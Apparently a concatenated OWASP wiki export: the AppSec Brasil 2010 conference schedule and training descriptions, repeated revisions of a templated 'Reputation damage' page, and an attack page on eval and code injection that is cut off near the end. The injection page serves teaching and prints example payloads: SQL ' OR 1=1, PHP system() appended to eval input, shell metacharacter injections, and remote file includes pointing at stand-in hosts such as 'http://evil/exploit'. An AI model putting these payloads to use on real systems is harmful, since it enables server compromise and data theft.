Aditya K Sood is a Security Researcher, consultant and PhD candidate in Computer Science Department at Michigan State University.He has worked in the security domain for Armorize, COSEINC and KPMG. He is a founder of SecNiche Security, an independent security research arena. He has been an active speaker at conferences like RSA (US 2010), TRISC, EuSecwest, XCON, Troopers, OWASP AppSec, FOSS, CERT-IN etc. He has writtencontent for HITB Ezine, Hakin9, Usenix Login, Elsevier Journals, Debugged! MZ/PE.He has released number of advisories to forefront companies.Apart from his normal routine work he loves to do lot of web based research and designing cutting edge attack vector.

==== Schedule ====

<center>'''<span style="color: rgb(255, 0, 0)"> Note: this schedule is tentative and subject to change. </span>''' </center>

== Conference Program - Day 1 - November 18th 2010 ==
<center>
{| width="80%" class="t"
|-
| width="14%" height="17" align="right" | 08:30 - 09:00
| bgcolor="#8595c2" align="CENTER" | '''Reception Desk Open'''
|-
| width="14%" height="17" align="right" | 09:00 - 09:30
| bgcolor="#b9c2dc" align="CENTER" | '''Opening Ceremony'''
|-
| width="14%" height="49" align="right" | 09:30 - 10:20
| bgcolor="#eeeeee" align="CENTER" | '''Dinis Cruz'''<br> About OWASP
|-
| width="14%" height="17" align="right" | 10:20 - 10:40
| bgcolor="#d98b66" align="CENTER" | '''Break'''
|-
| width="14%" height="49" align="right" | 10:40 - 11:40
| bgcolor="#b9c2dc" align="CENTER" | '''Robert 'RSnake' Hansen'''<br> The Humble Cookie
|-
| width="14%" height="49" align="right" | 11:40 - 12:30
| bgcolor="#eeeeee" align="CENTER" | '''Cassio Goldschmidt'''<br> Responsibility for the Harm and Risk of Software Security Flaws
|-
| width="14%" height="17" align="right" | 12:30 - 14:30
| bgcolor="#d98b66" align="CENTER" | '''Lunch Break'''
|-
| width="14%" height="47" align="right" | 14:30 - 15:20
| bgcolor="#b9c2dc" align="CENTER" | '''Chris Hofmann'''<br> TBD
|-
| width="14%" height="32" align="right" | 15:20 - 16:10
| bgcolor="#eeeeee" align="CENTER" | '''Mano Paul'''<br> Wild Wild Wild Security Planet
|-
| width="14%" height="17" align="right" | 16:10 - 16:30
| bgcolor="#d98b66" align="CENTER" | '''Break'''
|-
| width="14%" height="47" align="right" | 16:30 - 17:20
| bgcolor="#b9c2dc" align="CENTER" | '''Tony Rodrigues''' <br> Tony’s Top 10 Application Artifacts: A Computer Forensics Approach to OWASP Top 10
|-
| width="14%" height="32" align="right" | 17:20 - 18:10
| bgcolor="#eeeeee" align="CENTER" | '''Amichai Shulman<br>''' Business Logic Attacks – BATs and BLBs
|-
| width="14%" height="47" align="right" | 18:10 - 19:00
| bgcolor="#b9c2dc" align="CENTER" | '''Gabriel Quadros''' <br> Taint Analysis of JavaScript Code to Detect Web Application Vulnerabilities
|-
| width="14%" height="17" align="right" | 19:00
| bgcolor="#cccccc" align="CENTER" | '''End of the First Day'''
|}
</center>
<br>

== Conference Program - Day 2 - November 19th 2010 ==
<center>
{| width="80%" class="t"
|-
| width="14%" height="17" align="right" | 08:30 - 09:00
| bgcolor="#8595c2" align="CENTER" | '''Reception Desk Open'''
|-
| width="14%" height="32" align="right" | 09:00 - 10:00
| bgcolor="#b9c2dc" align="CENTER" | '''Jeremiah Grossman'''<br> TBD
|-
| width="14%" height="47" align="right" | 10:00 - 10:50
| bgcolor="#eeeeee" align="CENTER" | '''Henrich Christopher Pöhls'''<br> The State of XML Digital Signatures --- How to Avoid Technical Pitfalls and Harvest the Power of Newer Signature Schemes
|-
| width="14%" height="17" align="right" | 10:50 - 11:10
| bgcolor="#d98b66" align="CENTER" | '''Break'''
|-
| width="14%" height="47" align="right" | 11:10 - 12:00
| bgcolor="#eeeeee" align="CENTER" | '''Rodrigo Montoro'''<br> Web Application First Aid - Virtual Patching with ModSecurity
|-
| width="14%" height="32" align="right" | 12:00 - 12:30
| bgcolor="#b9c2dc" align="CENTER" | '''Cel. Antonio Carlos Menna Barreto Monclaro'''<br> Presentation of Renasic - National Network for Information Security and Cryptography
|-
| width="14%" height="17" align="right" | 12:30 - 14:30
| bgcolor="#d98b66" align="CENTER" | '''Lunch Break'''
|-
| width="14%" height="32" align="right" | 14:30 - 15:20
| bgcolor="#eeeeee" align="CENTER" | '''Samy Kamkar'''<br> How I met your girlfriend
|-
| width="14%" height="32" align="right" | 15:20 - 16:10
| bgcolor="#b9c2dc" align="CENTER" | '''Christophe De La Fuente'''<br> Testing and Fuzzing FLEX: More fun with RIA
|-
| width="14%" height="32" align="right" | 16:10 - 17:00
| bgcolor="#eeeeee" align="CENTER" | '''Bian Contos'''<br> Exploring Three Modern Attack Vectors: Insiders, Industrialized and APTs
|-
| width="14%" height="17" align="right" | 17:00 - 17:20
| bgcolor="#d98b66" align="CENTER" | '''Break'''
|-
| width="14%" height="32" align="right" | 17:20 - 18:10
| bgcolor="#b9c2dc" align="CENTER" | '''Mauro Risonho de Paula Assumpção'''<br> The Tao of Hacking - Detecting Vulnerabilities in Web based Network Devices
|-
| width="14%" height="32" align="right" | 18:10 - 18:50
| bgcolor="#eeeeee" align="CENTER" | '''Dinis Cruz'''<br> OWASP O2 Project
|-
| width="14%" height="17" align="right" | 18:50 - 19:00
| bgcolor="#cccccc" align="CENTER" | '''Closing Ceremony'''
|}
</center>
<br>

==== Trainings ====

[[Image:Aspect logo.png]]

=== '''Secure Coding for J2EE Applications''' ===

[[Image:Jasonli appsecBR2010.jpg|frame]] '''Date and time: November 16th and 17th'''<br> '''Instructor: Jason Li'''<br> '''Summary'''<br> Training developers on secure coding practices offers one of the highest returns on investment of any security investment by eliminating vulnerabilities at the source. Aspect’s Java EE Secure Coding Training raises developer awareness of application security issues and provides examples of ‘what to do’ and ‘what not to do.' The class is lead by an experienced developer and is delivered in a very interactive manner. This class includes hands-on exercises where the students get to perform security analysis and testing on a live Java EE web application. This specially designed environment includes deliberate flaws the students have to find, diagnose, and fix. The class also uses Java EE coding exercises to provide students with realistic hands-on secure coding experience. Students gain hands-on experience using freely available web application security test tools to find and diagnose flaws and learn to avoid them in their own code.<br>

'''Audience'''<br> The intended audience for this course is intended for Java EE software developers and Java EE software testers who know how to program.<br>

'''Learning Objectives'''<br> At the highest level, the objective for this course is to ensure that developers are capable of designing, building, and testing secure Java EE applications and understand why this is important.<br>

'''Topics'''<br>

*'''HTTP Fundamentals'''<br>
**Understand and be able to employ the security features involved with using HTTP (e.g., headers, cookies, SSL)<br>
*'''Design Principles and Patterns'''<br>
**Understand and be able to apply application security design principles.<br>
*'''Threats'''<br>
**Be able to identify and explain common web application security threats (e.g. , cross-site scripting, SQL injection, denial of service attacks, "Man-in-the-middle" attacks, etc.) and implement mitigation techniques.<br>
*'''Authentication and Session Management'''<br>
**Be able to handle credentials securely while providing the full range of authentication support functions, including login, change password, forgot password, remember password, logout, reauthentication, and timeouts.<br>
*'''Access Control'''<br>
**Be able to implement access control rules for the user interface, business logic, and data layers.<br>
*'''Input Validation'''<br>
**Be able to recognize potential input validation issues, particularly injection and Cross-site Scripting (XSS) problems, and implement appropriate input validation mechanisms for user input and other sources of input.<br>
*'''Command Injection'''<br>
**Understand the dangers of command injection and techniques for avoiding the introduction of this type vulnerability.<br>
*'''Error Handling'''<br>
**Be able to implement a consistent error (exception) handling and logging approach for an entire web application.<br>
*'''Cryptography'''<br>
**Learn when to apply cryptographic techniques and be able to choose algorithms and use encryption/decryption and hash functions securely.<br>

'''Jason’s Bio'''<br> Jason is a remarkable trainer, mastering five different training courses within a year’s time to our most valuable longstanding but diverse clients. The client base included a large financial institution, several leading shipping and logistics Management Company, and a leading Government systems integrator.<br>

Jason has also taught Advanced Web Application Security Testing and Building Secure Web Applications classes at OWASP 2008 conferences in Belgium and India.<br>

Common remarks returned from Jason’s class evaluations include '''“This is probably one of the most important classes I‘ve been exposed to here”''' and '''“One of the best instructors I’ve ever had. Really knowledgeable of the subject. Kept class interested by sharing real life examples that depicted good scenarios”'''<br>

== Using the OWASP ESAPI security API to provide security to web applications ==

'''<span style="color: rgb(255, 0, 0);"> Tutorial in Portuguese. </span>'''

'''Date and time: November 16th (9AM to 6PM)'''<br> '''Instructor: Tarcizio Vieira Neto'''<br>

'''Summary'''

The evolution of technology in the development of web applications has contributed to a significant increase in the use of this technology to meet the most diverse purposes. However, this technology is subject to critical security vulnerabilities, especially when recent research show that most vulnerabilities are present in the application itself. OWASP's ESAPI library (Enterprise Security API) appears in this scenario as an open source security library available for several languages such as Java EE, PHP,. NET, Classic ASP, Python, Ruby, among others. This short course addresses the vulnerabilities caused by common errors in applications development and security control mechanisms provided by ESAPI with focus on Java technology. The general principles learned in the course can be applied in the context of other programming languages.

'''Target audience'''

The desired profile of the audience are people connected to the area of web application development and security, having as a basic pre-requisite knowledge in web technologies, communication protocols HTTP and HTTPS, basic principles of security: encryption, hashing and digital signature, Java programming for Web systems.

'''Learning objectives'''

* Know the main security vulnerabilities commonly found in Web applications
* Present the architecture of the ESAPI library and the operation of its modules with examples in Java.
* Present Web Application Firewall component of ESAPI.

'''Tópic'''

# Introduction
# # Myths related to security in Web applications
# # OWASP Project
# OWASP Top 10
# OWASP ESAPI Library
# # Validation and Encoding Module
# # Authentication Module
# # Access Control Module
# # HTTP Utilities Module
# # Access references module
# # Cryptographic Module
# # Log Module
# # Intrusion Detection Module
# # integrating the AppSensor module with ESAPI
# # Using Filters
# # Configuring ESAPI
# # Web Application Firewall Module
# Benefits of Using ESAPI
# Conclusions

'''Instructor'''

Tarcízio Vieira Neto has a degree in Computer Science from Universidade Federal de Goiás (UFG), in Goiania. He began his career as an intern developer on a project of technology initiation funded by CNPq in the company Estratégia, in Goiania. After graduating he worked for six months at the company Fibonacci Soluções Ágeis in the same city, as a development analyst. Then worked for two years and eight months as a Brazilian Air Force officer as a systems analyst in the Air Force Computer Center in Brasilia, where he gained experience with the technologies of digital certification and collaborated in the development of an enterprise electronic document management system.

Currently working at SERPRO since November 2009 as an Analyst in CETEC, working on software development security, dedicated primarily in writing guidelines that standardize techniques and tools tho support security in Web applications development

He is attending a specialization course in Information Security from University of Brasília (UnB) and has altogether more than five years of programming experience in Java.

==The Art and Science of Threat Modeling Web Applications==
[[Image:Mano_Paul.jpg|thumb|10px|frame|right|Mano Paul]]
'''<span style="color: rgb(255, 0, 0);"> This tutorial is in English without translation. </span>'''

'''Date and Time: November 17 (9AM to 6PM)'''<br> '''Instructor: Mano Paul'''<br>

'''Summary'''

To secure your home, you will first need to know how the thief could possibly enter and exit and where you should store your valuables. The same is true of your web applications. Unless you know what the vulnerabilities and threats of your web applications are, and what security measures you should take to protect them, ev1L h@x0rS or the enemy within (insider) could take advantage of the vulnerabilities.

Threat Modeling is a technique that you can use to identify ATVS (attacks, threats, vulnerabilities and safeguards) that could affect your web applications. Threat Modeling helps in designing your application securely from a confidentiality, integrity, availability, authentication, authorization and auditing perspective. It is an essential activity to be undertaken during the design stage of your SDLC and helps mitigate and minimize overall risk.

'''Target audience'''

The target audience is made of technical staff and management of system development organizations, with no required knowledge of languages or specific programming techniques.

'''Learning Objectives'''

# Understand Threat Modeling; when to threat model and when not too
# Translation of threats to risks for the organization
# Have fun learning complex concepts with exercises and interactive games

'''Topic'''

# Introduction
# Why Threat Model?
# Is Threat Modeling Right for You?
# Challenges
# Precursors
# Data Classification and Threat Modeling
# Web Application Security Mechanisms
# Benefits of Threat Modeling
# Common Glossary of Terms
# Threat Agents
# OWASP Top 10 and common application attacks
# Threat Modeling Process
# Attack Trees
# Threat and Risk Frameworks e.g., STRIDE and DREAD
# Threat to Risk translation
# Threat Modeling (<span style="color: rgb(255, 0, 0);">Hands-On Exercise</span>)

'''Instructor'''

Manoranjan (Mano) Paul is the Software Assurance Advisor for (ISC)2. His information security and software assurance experience includes designing and developing security programs from compliance-to-coding, security in the SDLC, writing secure code, risk management, security strategy, and security awareness training and education. He founded and serves as the CEO & President of Express Certifications. He also founded SecuRisk Solutions, a company that specializes in security product development and consulting.

== Security in Service-oriented architectures ==

'''<span style="color: rgb(255, 0, 0);"> Tutorial in Portuguese. </span>'''

'''Date and time: Nov 17 (9AM to 6PM)'''<br> '''Instructors: Douglas Rodrigues, Julio Cesar Estrella e Nuno Manuel dos Santos Antunes'''<br>

'''Summary'''

Web services are the cornerstone of Service-Oriented Architectures (SOA). As critical components of business, Web services must provide high security. However, the deployment of secure Web services is a complex task. In fact, several studies show that a large number of Web Services are deployed with security breaches ranging from code vulnerabilities (eg vulnerabilities that allow code injection, including SQL injection and XPath injection) to the incorrect use of standards and security protocols. The aim of this short course is to present the theoretical and practical tools that allow the detection of vulnerabilities and security protocols and mechanisms against attacks.

'''Público Alvo'''

The target audience is composed of technical staff and operational systems development organizations with requirements for knowledge of languages and programming methodologies at the intermediate level.

'''Learning Objectives'''

The proposed short course contributes to add new technological trends. The theme is quite interesting in relation to the great challenges of research in computing, since it fits naturally within the technological development of quality, encompassing making systems available, accurate, secure, scalable, persistent and ubiquitous, and notoriously, observing the conference area, which SOA, Web services and security are the subject of growing research in computing, as it is current and of interest to the academic community, as well as professionals who work in the labor market. The interest in SOA has grown in recent years because it is an approach that helps the system to remain flexible and scalable as they grow, and can also help to resolve the gap business / IT. Students and professionals will have the opportunity to understand the basics of vulnerability detection code level and also to detect attacks between protocols and mechanisms. The idea is that participants can use the knowledge gained in this brief short course for the development of distributed applications using Web services secure and obtain knowledge needed to diagnose and prevent attacks on this type of application.

'''Topics'''

#SECURITY STANDARDS AND PROTOCOLS FOR WEB SERVICES
#ATTACKS IN WEB SERVICES
## Denial of Service Attacks
## Attacks Brute Force
## Spoofing Attacks
## Flooding Attacks
## Injection Attacks
#EVALUATING SECURITY IN WEB SERVICES
## Case Study on security in Web Services
## "white box" analysis
## "Black-box" testing
## "Gray-box" testing
## Case study on the effectiveness of tools for security assessment

'''Instructors'''

Julio Cesar Estrella - Master in Computer Science and Computational Mathematics, in the area of Distributed Systems (Institute of Mathematical Sciences and Computer ICMC / University of São Paulo - USP). During the Masters, worked with simulated queuing network in a project related to the development of negotiation techniques in models of web servers with service differentiation. Ph.D. in Computer Science and Computational Mathematics (Institute of Mathematical Sciences and Computer ICMC / University of São Paulo - USP). The theme of his doctoral thesis was about service-oriented architectures to support QoS and characterization of workloads for Web Services Composition and Service also supports Quality of Service. He is currently a professor at the Federal Technological University of Paraná (UTFPR - Campo Mourão)

Douglas Rodrigues - Master in Computer Science and Computational Mathematics from Institute of Mathematics and Computer Science, University of São Paulo - ICMC-USP/São Carlos. Bachelor of Computer Science from University Euripides Marília - Univ - Marília / SP. Works on the following subjects: SOA, Web Services, performance evaluation, encryption and security.

Nuno dos Santos Antunes - attended from 2003 to 2007, the Computer Engineering program, University of Coimbra. Since 2008, carries out scientific research in the group of Software and Systems Engineering (SSE) Center for Informatics and Systems University of Coimbra (CISUC), on topics related to methodologies and tools for developing Web Services without vulnerabilities. Concluded in 2009 a Masters in Computer Engineering from the Department of Computer Engineering, University of Coimbra, with the final rating of Very Good. In 2009 he began his PhD in Sciences and Information Technology. He published five scientific papers in conferences with the process of rigorous peer review, including articles in the most prestigious conferences in the areas of reliability and services.

==Black-Box & White-Box ASP.NET Security Reviews using the OWASP O2 Platform==

'''<span style="color: rgb(255, 0, 0);"> Thsi tutorial will be in Portuguese with materials in English </span>'''

'''Date and time: November 16th (9AM to 6 PM)'''<br> '''Instructor: Dinis Cruz'''<br>

'''Summary'''

This is a hands-on Training course on how to use the OWASP O2 Platform to perform both Black-Box and White-Box security reviews on ASP.NET Web Applications

The course is designed for security consultants/developers who are responsible for performing Penetration Tests or Security Code Reviews. The course will show practical examples of how to use the OWASP O2 Platform to find, exploit and document security vulnerabities.

For the course's labs, a number of test and real-world applications/frameworks will be used. In order to give the students a benign test enviroment which is easy to replicate, the (vulnerable-by-design) HacmeBank ASP.NET banking application will be used throughout the course.

'''Topics'''

* What is the OWASP O2 Platform and how to use it?
* Using O2's Unit Tests for web exploration and browsing
* Using O2's Unit Tests for web exploitation
* Understanding and using O2's Web Automation Tools to find and exploit vulnerabilities in HacmeBank (Black-Box)
* Understanding and using O2's AST .NET Scanner to find vulnerabilities in HacmeBank (White-Box)
* Connecting the source-code traces with the web exploits to create a unified view of the vulnerabilties
* Create 'Vulnerability-driven Unit Tests' to be delivered to Developers, QA/Testers and Managers
* Customizing and writing new APIs (for new or modified frameworks)
* Using O2 to consume results from open source tools and 3rd party commercial vendors
* Case Study: Microsoft ASP.NET MVC
* Case Study: Microsoft Sharpoint

'''Instructor'''

The course is delivered by Dinis Cruz who the lead developer of the OWASP O2 Platform and has created and delivered a number of .NET Security training courses

== Location ==

Please check the ''Venue'' tab in this page.

==== Venue ====

The event will be held in Campinas, SP, Brazil at: [http://www.cpqd.com.br Fundação CPQD].

You can check the location at [http://maps.google.com.br/maps/ms?source=embed&hl=pt-BR&geocode=&ie=UTF8&update=1&t=h&msa=0&msid=104978801628275418750.000462bf2d1a49a7571af&ll=-22.83125,-47.044315&spn=0.03718,0.04034&z=14 Google Maps]

''How to get there''

TBD

==== Registration ====

== Online Registration ==

Registration form is available at https://creator.zoho.com/lucas.ferreira/appsec/

== Conference Fees ==

'''Access to conference:'''

* Before Sep 16th: 400.00 BRL
* Before Oct 16th: 500.00 BRL
* Before Nov 12th: 550.00 BRL
* On site: 600.00 BRL

On site registration subject to the availability of seats.

'''Trainings'''

* One day: 450.00 BRL
* Two days: 900.00 BRL

'''Discounts'''

* OWASP Member: 100.00 BRL (Note: This discount is greater than the OWASP USD 50.00 annual fee. Check [http://www.google.com.br/#q=50+usd+in+brl&fp=1 here]
* Student: 100.00 BRL (Note: student ID required).
* Special discounts available for groups registrations. Please send inquiries to organizacao2010@appsecbrasil.org

==== Committees ====

== Conference Committee ==

OWASP Global Conferences Committee Chair: Mark Bristow

OWASP [[Brazilian]] Chapter Leader: Wagner Elias

AppSec Brasil 2010 Organization Team (organizacao2010 at appsecbrasil.org):

*Conference General Chair: Lucas C. Ferreira
*Tutorials Chair: Eduardo Camargo Neves
*Tracks Chair: Luiz Otávio Duarte
*Local Chair: Alexandre Melo Braga

=== Team Members ===

*Alexandre Melo Braga
*Eduardo Camargo Neves
*Lucas C. Ferreira
*Luiz Otávio Duarte
*Wagner Elias
*Eduardo Alves Nonato da Silva
*Leonardo Buonsanti
*Dinis Cruz
*Paulo Coimbra

== Programme Committee:==
* Alexandre Braga
* Carlos Serrao
* Eduardo alves
* Fernando Cima
* Leonardo Buonsanti
* Lucas Ferreira
* Luiz Duarte
* Nelson Uto
* Rodrigo Rubira
* Wagner Elias

<br> <br>

==== Travel ====

==== Twitter ====

<twitter>124443335</twitter>

==== Links ====

Blog: http://blog.appsecbrasil.org

Twitter: http://twitter.com/owaspappsecbr

Banner: http://www.owasp.org/images/3/31/AppSec_Brasil_2010_Banner.gif

Powerpoint template: [[Media:OWASP_Presentation_Template_BrazilAppSec2010.ppt]]

<br> <headertabs />

[[Category:OWASP_AppSec_Conference]]

Category:Reputation damage

2008-07-08T03:48:25Z

Edualves: /* Risk Factors */

{{Template:Business Impact}}

Last revision : '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The image of an institution is built for years due to many factors, such
and reliability in service.
However its volatility is extremely high just because
only one incident, be it of any kind, so there is an damage to his reputation.
So an reputation damage is when a company has its image and credibility
shaken for any reason, such as an invasion by banking systems.
It is extremely difficult to measure the depreciation of the reputation of a company to one of its main asset: its image towards society.

==Risk Factors==

* Attacks against company assets
* Misuse of technological resources

==Examples==

===Short example name===
: A short example description, small picture, or sample code with [http://www.site.com links]

===Short example name===
: A short example description, small picture, or sample code with [http://www.site.com links]

==Related [[Technical Impacts]]==

* [[Technical Impact 1]]
* [[Technical Impact 2]]

==References==

* http://www.link1.com
* [http://www.link2.com Title for the link2]

Category:Reputation damage

2008-07-08T03:46:39Z

Edualves: /* Risk Factors */

{{Template:Business Impact}}

Last revision : '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The image of an institution is built for years due to many factors, such
and reliability in service.
However its volatility is extremely high just because
only one incident, be it of any kind, so there is an damage to his reputation.
So an reputation damage is when a company has its image and credibility
shaken for any reason, such as an invasion by banking systems.
It is extremely difficult to measure the depreciation of the reputation of a company to one of its main asset: its image towards society.

==Risk Factors==

* Invasions
* Attacks against company assets
* Misuse of technological resources

==Examples==

===Short example name===
: A short example description, small picture, or sample code with [http://www.site.com links]

===Short example name===
: A short example description, small picture, or sample code with [http://www.site.com links]

==Related [[Technical Impacts]]==

* [[Technical Impact 1]]
* [[Technical Impact 2]]

==References==

* http://www.link1.com
* [http://www.link2.com Title for the link2]

Category:Reputation damage

2008-07-08T03:44:51Z

Edualves: /* Risk Factors */

{{Template:Business Impact}}

Last revision : '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The image of an institution is built for years due to many factors, such
and reliability in service.
However its volatility is extremely high just because
only one incident, be it of any kind, so there is an damage to his reputation.
So an reputation damage is when a company has its image and credibility
shaken for any reason, such as an invasion by banking systems.
It is extremely difficult to measure the depreciation of the reputation of a company to one of its main asset: its image towards society.

==Risk Factors==

* Talk about the [[OWASP Risk Rating Methodology|factors]] that govern this business impact
* Try to be clear about the factors that make this impact serious
* Invasions, attacks against company resources, misuse of tecnology resources

==Examples==

===Short example name===
: A short example description, small picture, or sample code with [http://www.site.com links]

===Short example name===
: A short example description, small picture, or sample code with [http://www.site.com links]

==Related [[Technical Impacts]]==

* [[Technical Impact 1]]
* [[Technical Impact 2]]

==References==

* http://www.link1.com
* [http://www.link2.com Title for the link2]

Category:Reputation damage

2008-07-08T03:36:41Z

Edualves:

{{Template:Business Impact}}

Last revision : '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The image of an institution is built for years due to many factors, such
and reliability in service.
However its volatility is extremely high just because
only one incident, be it of any kind, so there is an damage to his reputation.
So an reputation damage is when a company has its image and credibility
shaken for any reason, such as an invasion by banking systems.
It is extremely difficult to measure the depreciation of the reputation of a company to one of its main asset: its image towards society.

==Risk Factors==

* Talk about the [[OWASP Risk Rating Methodology|factors]] that govern this business impact
* Try to be clear about the factors that make this impact serious

==Examples==

===Short example name===
: A short example description, small picture, or sample code with [http://www.site.com links]

===Short example name===
: A short example description, small picture, or sample code with [http://www.site.com links]

==Related [[Technical Impacts]]==

* [[Technical Impact 1]]
* [[Technical Impact 2]]

==References==

* http://www.link1.com
* [http://www.link2.com Title for the link2]

Category:Reputation damage

2008-07-08T03:35:21Z

Edualves:

{{Template:Business Impact}}

Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The image of an institution is built for years due to many factors, such
and reliability in service.
However its volatility is extremely high just because
only one incident, be it of any kind, so there is an damage to his reputation.
So an reputation damage is when a company has its image and credibility
shaken for any reason, such as an invasion by banking systems.
It is extremely difficult to measure the depreciation of the reputation of a company to one of its main asset: its image towards society.

==Risk Factors==

* Talk about the [[OWASP Risk Rating Methodology|factors]] that govern this business impact
* Try to be clear about the factors that make this impact serious

==Examples==

===Short example name===
: A short example description, small picture, or sample code with [http://www.site.com links]

===Short example name===
: A short example description, small picture, or sample code with [http://www.site.com links]

==Related [[Technical Impacts]]==

* [[Technical Impact 1]]
* [[Technical Impact 2]]

==References==

* http://www.link1.com
* [http://www.link2.com Title for the link2]

Category:Reputation damage

2008-07-08T03:30:13Z

Edualves: New page: The image of an institution is built for years due to many factors, such and reliability in service. However its volatility is extremely high just because only one incident, be it of any ...

The image of an institution is built for years due to many factors, such
and reliability in service.
However its volatility is extremely high just because
only one incident, be it of any kind, so there is an damage to his reputation.
So an reputation damage is when a company has its image and credibility
shaken for any reason, such as an invasion by banking systems.
It is extremely difficult to measure the depreciation of the reputation of a company to one of its main asset: its image towards society.

Direct Dynamic Code Evaluation ('Eval Injection')

2008-07-02T11:40:23Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack consists in a script does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement which results in code execution.

Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands.

Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.

==Examples==

===Example 1===
In this example an attacker can control all or part of an input string that is fed into an eval() function call

<pre><nowiki>
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
</nowiki></pre>

The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo".

===Example 2===
The following is a example of [[SQL Injection]], consider a web page has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password'

If this query returns exactly one row, then access is granted. However, if the malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password' OR '1'='1'

In the example above, "Password" is assumed to be blank or some innocuous string. "1=1" will always be true and many rows will be returned, thereby allowing access. The final inverted comma will be ignored by the SQL parser. The technique may be refined to allow multiple statements to run, or even to load up and run external programs.

===Example 3===
This is a example of a file was injected. Consider this PHP program (which includes a file specified by request):

<pre><nowiki>
<?php
$color = 'blue';
if ( isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
<form>
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
</nowiki></pre>

The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:

* <code>/vulnerable.php?COLOR='''<nowiki>http://evil/exploit</nowiki>'''</code> - injects a remotely hosted file containing an exploit.

* <code>/vulnerable.php?COLOR='''C:\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit.

* <code>/vulnerable.php?COLOR='''..\..\..\..\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit, using [[Path Traversal]].

* <code>/vulnerable.php?COLOR='''C:\notes.txt%00'''</code> - example using Null character, Meta character to remove the <code>.php</code> suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)

===Example 4===
A simple URL which demonstrate a way to do this attack:

<nowiki>http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt? </nowiki>

===Example 5===
Shell Injection applies to most systems which allows software to programmatically execute Command line. Typical sources of Shell Injection is calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs.

Consider the following short PHP program, which runs an external program called '''funnytext''' to replace a word the user sent with some other word)

<pre><nowiki>
<HTML>
<?php
passthru ( " /home/user/phpguru/funnytext "
. $_GET['USER_INPUT'] );
?>
</nowiki></pre>

This program can be injected in multiple ways:
* '''`command`''' will execute '''command'''.
* '''$(command)''' will execute '''command'''.
* '''; command''' will execute '''command''', and output result of command.
* '''| command''' will execute '''command''', and output result of command.
* '''&& command''' will execute '''command''', and output result of command.
* '''|| command''' will execute '''command''', and output result of command.
* '''> /home/user/phpguru/.bashrc''' will overwrite file '''.bashrc'''.
* '''< /home/user/phpguru/.bashrc''' will send file '''.bashrc''' as input to '''funnytext'''.

PHP offers [http://www.php.net/manual/en/function.escapeshellarg.php escapeshellarg()] and [http://www.php.net/manual/en/function.escapeshellcmd.php escapeshellcmd()] to perform '''encoding''' before calling methods. However, it is not recommended to trust these methods to be secure - also validate/sanitize input.

===Example 6===
The following code is a vulnerable a eval() injection, because it don’t sanitize the user’s input (in this case: “username”), the program just save this input in txt file, and after the server will execute this file without any validation. In this case the user is able to insert a command instead of a username.

Example:
<pre><nowiki>
<%
If not isEmpty(Request( "username" ) ) Then
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "userlog.txt" ), ForAppending, True)
f.Write Request("username") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing
%>
<h1>List of logged users:</h1>
<pre>
<%
Server.Execute( "userlog.txt" )
%>
</pre>
<%
Else
%>
<form>
<input name="username" /><input type="submit" name="submit" />
</form>
<%
End If
%>
</nowiki></pre>

==Related [[Threat Agents]]==

* [[:Category:Insider]]

* [[:Category:Staff]]

==Related [[Attacks]]==

*[[Direct Static Code Injection]]
*[[Code Injection]]
*[[:Category:Injection Attack | Injection Attacks]]

==Related [[Vulnerabilities]]==

* [[:Category: Input Validation]]

==Related [[Controls]]==

* [[:Category:Input Validation]]

==References==

*http://secunia.com/cve_reference/CVE-2006-2005/?show_result=1
* http://en.wikipedia.org/wiki/Code_injection

__NOTOC__

Direct Static Code Injection

2008-07-02T11:40:04Z

Edualves: /* Related Controls */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Direct Static Code Injection attack consists on injecting code directly onto the resource used by application while processing a user request. This is normally performed by tampering libraries and template files which are created based on user input without proper data sanitization.
Upon a user request to the modified resource, the actions defined on it will be executed at server side in the context of web server process.

[[Server-Side Includes (SSI) Injection | Server Side Includes]] is considered a type of direct static code injection. It should not be confused with other types of code injection, like [[Cross Site Scripting | XSS]] (“Cross Site Scripting” or “HTML injection”) where the code is executed on client side.

==Examples==

===Example 1===
This is a simple example of exploitation of CGISCRIPT.NET csSearch 2.3 vulnerability, published on Bugtraq ID: 4368.
By requesting the following URL to the server, it’s possible to execute commands defined on ‘’’’setup’’’ variable.
<br>
